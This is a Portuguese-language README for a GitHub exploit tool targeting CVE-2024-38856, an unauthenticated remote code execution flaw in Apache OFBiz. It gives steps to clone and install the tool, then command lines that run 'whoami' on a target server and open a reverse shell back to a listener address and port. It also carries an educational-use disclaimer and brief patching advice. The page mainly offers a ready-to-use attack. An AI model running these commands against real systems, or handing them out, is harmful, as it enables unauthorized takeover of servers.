
Exploit para Apache OFBiz - CVE-2024-38856
Exploit para Apache OFBiz (CVE-2024-38856) Por: Alisson Faoli
Este repositório contém um exploit para a vulnerabilidade CVE-2024-38856 encontrada no Apache OFBiz. A falha permite RCE (Execução Remota de Código) sem autenticação.
Nota: Este exploit é fornecido apenas para fins educacionais e de pesquisa. O uso indevido pode ser ilegal e é de inteira responsabilidade do usuário.
CVE: CVE-2024-38856
Software Afetado: Apache OFBiz até a versão 18.12.14
Tipo de Vulnerabilidade: RCE
Exploração: Autenticação não necessária
Clone o repositório:
git clone https://github.com/AlissonFaoli/Apache-OFBiz-Exploit.git
cd Apache-OFBiz-Exploit
Instale as dependências:
pip install -r requirements.txt
Execute o exploit:
RCE:
python3 CVE-2024-38856.py cmd -t https://10.150.10.200:8443 "whoami"
SHELL:
python3 CVE-2024-38856.py shell -t https://10.150.10.200:8443 -l 10.150.10.123 -p 4444
Para corrigir esta vulnerabilidade, recomenda-se que os administradores do Apache OFBiz: Atualizem para a versão corrigida disponível em https://ofbiz.apache.org/download.html. Apliquem regras de firewall ou WAF para bloquear tentativas conhecidas de exploração.
Se você tiver alguma dúvida ou quiser relatar uma melhoria no exploit, entre em contato: LinkedIn: https://linkedin.com/in/alisson-faoli/
Este código é fornecido exclusivamente para fins educacionais e testes de segurança em ambientes autorizados. O autor não se responsabiliza por qualquer uso indevido.